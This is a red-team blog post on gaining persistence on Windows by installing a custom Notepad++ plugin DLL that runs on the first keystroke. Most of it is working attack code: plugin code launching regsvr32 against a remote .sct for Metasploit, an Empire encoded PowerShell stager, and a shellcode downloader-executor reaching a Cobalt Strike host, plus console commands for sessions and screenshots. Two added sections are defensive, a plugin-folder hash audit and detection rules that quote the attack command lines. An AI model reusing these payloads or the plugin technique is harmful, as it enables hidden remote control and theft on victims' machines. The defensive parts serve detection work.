
Title: Using a custom Notepad++ plugin for persistence

0x00 Preface

Notepad++ is a popular Windows text editor that can be extended through plugins. It is common in Windows environments, especially on the hosts of developers and IT staff. Besides being a source of valuable information for Red Team operators, it can also be used for persistence: an arbitrary plugin can be loaded, or a script can be fetched from a remote location and executed.

0x01 Basic message box example

Notepad++ plugins extend the editor's functionality. By default, users install the plugins they need from Notepad++'s list of trusted plugins, but custom plugins can also be installed and run without any verification, which gives developers the flexibility of an extensible text editor. A plugin is a DLL file; to install a custom plugin, just place the DLL at %PROGRAMFILES%\Notepad++\plugins\pluginName\pluginName.dll.

The advantage is that loading or activating the plugin requires no user interaction. The disadvantage is that local administrator rights are needed to write to that directory. Note that for the plugin to load, the folder name and the DLL file name must be identical. Red Team operators do not need to write a malicious plugin from scratch, because the Notepad++ plugin pack can be used as a template to modify. Several notifications can be hooked to perform an action when a specific event occurs: SCI_ADDTEXT fires when characters are entered in Notepad++ and can be used to trigger a custom command. In the following example, a message box pops up when a character is inserted.

The .NET template at https://github.com/kbilsted/NotepadPlusPluginPack.Net/blob/master/Visual%20Studio%20Project%20Template%20C%23/Main.cs can be used as a starting point: modify the code under OnNotification.

The modified code is as follows:

```csharp
class Main
{
    static bool ExecuteOnce = true;

    public static void OnNotification(ScNotification notification)
    {
        // SCI_ADDTEXT is sent when characters are inserted; act on the first one only
        if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && ExecuteOnce)
        {
            MessageBox.Show("Persistence via Notepad++ - Visit https://pentestlab.blog");
            ExecuteOnce = !ExecuteOnce;
        }
    }
}
```

Or:

```csharp
class Main
{
    static bool firstRun = true;

    public static void OnNotification(ScNotification notification)
    {
        if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && firstRun)
        {
            // show which process is hosting the plugin (notepad++.exe and its PID)
            using var process = Process.GetCurrentProcess();
            MessageBox.Show($"Hello from {process.ProcessName} ({process.Id}).");
            firstRun = !firstRun;
        }
    }
}
```

(Figure: Notepad++ plugin message box example)

Compiling the code produces a DLL that must be copied into place with administrator privileges, since write access to the plugin subfolder is required.

```
dir "C:\Program Files\Notepad++\plugins\pentestlab"
```

(Figure: Notepad++ plugin location)

The next time Notepad++ is started and characters are entered, the message box pops up, showing that the code compiled and executed successfully.

(Figure: Notepad++ executed successfully)
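A defensive counterpart to the loading rule described above, added here and not part of the original post: an audit that walks the plugins folder, looks only at the `<name>\<name>.dll` pair Notepad++ actually loads, and flags folders that are not in an allowlist or whose DLL hash has changed. The plugins path, the allowlist source and the fixture files are assumptions constructed for the demo.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def audit_plugins(plugins_root, allowlist):
    """Notepad++ only loads <plugins>\\<name>\\<name>.dll, so audit exactly that
    pair in every subfolder. Returns (folder, reason, sha256) tuples."""
    findings = []
    for folder in sorted(p for p in Path(plugins_root).iterdir() if p.is_dir()):
        dll = folder / (folder.name + ".dll")
        if not dll.is_file():
            continue  # nothing loadable here (e.g. the Config folder)
        digest = sha256_file(dll)
        if folder.name not in allowlist:
            findings.append((folder.name, "unknown plugin, not in allowlist", digest))
        elif allowlist[folder.name] != digest:
            findings.append((folder.name, "allowlisted name but DLL hash changed", digest))
    return findings

def build_fixture():
    """Constructed sample layout, not a real install: one allowlisted plugin,
    one allowlisted plugin whose DLL was replaced, one unknown plugin, and a
    folder without a loadable DLL. Plugin names are assumptions."""
    root = Path(tempfile.mkdtemp(prefix="npp-plugins-"))
    for name, content in [("mimeTools", b"MZ-known"), ("NppExport", b"MZ-replaced"),
                          ("pentestlab", b"MZ-unknown")]:
        (root / name).mkdir()
        (root / name / f"{name}.dll").write_bytes(content)
    (root / "Config").mkdir()
    allowlist = {
        "mimeTools": sha256_file(root / "mimeTools" / "mimeTools.dll"),
        "NppExport": hashlib.sha256(b"MZ-original").hexdigest(),  # differs from disk
    }
    return root, allowlist

if __name__ == "__main__":
    root, allowlist = build_fixture()
    for name, reason, digest in audit_plugins(root, allowlist):
        print(f"{name}: {reason} ({digest[:12]}...)")
```

On a real host, point `audit_plugins` at %PROGRAMFILES%\Notepad++\plugins and build the allowlist from a known-good install; a periodic run also catches the write to the folder that this technique needs administrator rights for.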

0x02 MSF reverse shell example

Fileless payloads can also be executed to establish a communication channel. Here the Windows Regsvr32 binary is used to load a script from a remote location. The Metasploit Framework supports this through the web_delivery module.

```
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.3
set LPORT 4444
run
```

The regsvr32 command that Metasploit prints can then be adapted slightly with the required parameters so that the plugin executes it:

```csharp
class Main
{
    static bool firstRun = true;

    public static void OnNotification(ScNotification notification)
    {
        if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && firstRun)
        {
            string strCmdText = "/s /n /u /i:http://10.0.0.3:8080/nHIcvfz6N.sct scrobj.dll";
            Process.Start("regsvr32", strCmdText);
            firstRun = !firstRun;
        }
    }
}
```

(Figure: Notepad++ regsvr32 method)

As in the first example, the command is executed when new characters are entered in Notepad++.

(Figure: Notepad++ persistence trigger)

The Meterpreter handler is listening and the communication channel is established.

(Figure: Notepad++ regsvr32 Meterpreter)

Run the following commands to start interacting with the target host:

```
sessions
sessions -i 1
pwd
getuid
```

(Figure: Notepad++ Meterpreter shell)

0x03 Empire reverse shell example

In a similar way, Empire C2 can generate various stager files. These usually contain a base64 command that is executed by a PowerShell process. The following uses the stager method as an example:

```
usestager windows/launcher_sct
set Listener http
execute
```

(Figure: Empire stager module)

The stager must point to a listener that is already running in Empire; executing the command writes the file to the "generated-stagers" folder.

(Figure: Empire stager configuration and generation)

The generated launcher.sct file can be uploaded to the target system and executed through regsvr32, or the base64 string from launcher.sct can be copied and used directly inside the plugin to avoid the antivirus check.

(Figure: Empire PowerShell base64 payload)

Sample code:

```csharp
class Main
{
    static bool ExecuteOnce = true;

    public static void OnNotification(ScNotification notification)
    {
        if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && ExecuteOnce)
        {
            // the base64 string is taken from the generated launcher.sct
            string strCmdText = "-noP -sta -w 1 -enc <base64 command from launcher.sct>";
            Process.Start("powershell", strCmdText);
            ExecuteOnce = !ExecuteOnce;
        }
    }
}
```

(Figure: Notepad++ plugin)

After the Empire stager command is triggered, a new interactive shell appears in Empire.

```
agents
```

(Figure: Empire agents)

Empire modules can also be used for information collection through the Notepad++ agent, such as screenshots of the host desktop and information like usernames, connection strings or URLs.

```
usemodule powershell/collection/screenshot
set Agent notepad
execute
```

(Figure: Notepad++ Empire screenshot)

(Figure: Notepad++ screenshot)
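Both triggers above (regsvr32 fetching a remote .sct, and PowerShell with an encoded command) leave the same telemetry: notepad++.exe as the parent of a script host. The following detection logic, added here and not from the original post, runs three rules over constructed Sysmon-style process-creation events; the event field names, the benign look-alike events and the placeholder base64 are assumptions modelled on the commands shown in this post.

```python
import ntpath

# Constructed process-creation events in the shape of Sysmon Event ID 1
# fields (not real telemetry). The first two mirror the regsvr32 and
# PowerShell triggers from this post; the last two are benign look-alikes.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://10.0.0.3:8080/nHIcvfz6N.sct scrobj.dll"},
    {"ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -noP -sta -w 1 -enc BASE64PLACEHOLDER"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Windows\System32\vbscript.dll"},
    {"ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "Image": r"C:\Program Files\Notepad++\updater\gup.exe",
     "CommandLine": "gup.exe -v8.4.4"},
]

# Script hosts and LOLBins that a text editor has no business spawning.
LOLBINS = {"regsvr32.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}

def _base(path):
    return ntpath.basename(path).lower()

def _is_encoded_powershell(cmd):
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    for tok in cmd.split():
        if tok.startswith("-") and len(tok) > 1 and "encodedcommand".startswith(tok[1:]):
            return True
    return False

def classify(event):
    """Return the names of the rules one event matches (empty list if benign)."""
    hits = []
    parent, child = _base(event["ParentImage"]), _base(event["Image"])
    cmd = event["CommandLine"].lower()
    if parent == "notepad++.exe" and child in LOLBINS:
        hits.append("notepad++.exe spawned a script host / LOLBin")
    if child == "regsvr32.exe" and "/i:http" in cmd and "scrobj.dll" in cmd:
        hits.append("regsvr32 loading a remote scriptlet through scrobj.dll")
    if child in ("powershell.exe", "pwsh.exe") and _is_encoded_powershell(cmd):
        hits.append("PowerShell launched with an encoded command")
    return hits

def hunt(events):
    """Map event index -> matched rules, for events that matched at least one rule."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```

The parent-process rule is the one that generalises: it also fires for cmd.exe, mshta.exe or rundll32.exe children even when the command line is obfuscated, while the other two rules pin down the exact techniques used here.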

0x04 Cobalt Strike reverse shell example

Replace the MessageBox with shellcode loaded from a Cobalt Strike listener; the code is as follows:

```csharp
if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && firstRun)
{
    using var client = new WebClient();
    var buf = client.DownloadData("http://172.19.215.47/shellcode");
    var hMemory = VirtualAlloc(
        IntPtr.Zero,
        (uint)buf.Length,
        AllocationType.Reserve | AllocationType.Commit,
        MemoryProtection.ReadWrite);
    Marshal.Copy(buf, 0, hMemory, buf.Length);
    _ = VirtualProtect(
        hMemory,
        (uint)buf.Length,
        MemoryProtection.ExecuteRead,
        out _);
    _ = CreateThread(
        IntPtr.Zero,
        0,
        hMemory,
        IntPtr.Zero,
        0,
        out _);
    firstRun = !firstRun;
}
```

(Figure: Cobalt Strike session from the Notepad++ plugin)

0x05 Summary

One drawback of this persistence technique is that it depends on the user typing characters, so a reverse shell may not be received frequently.
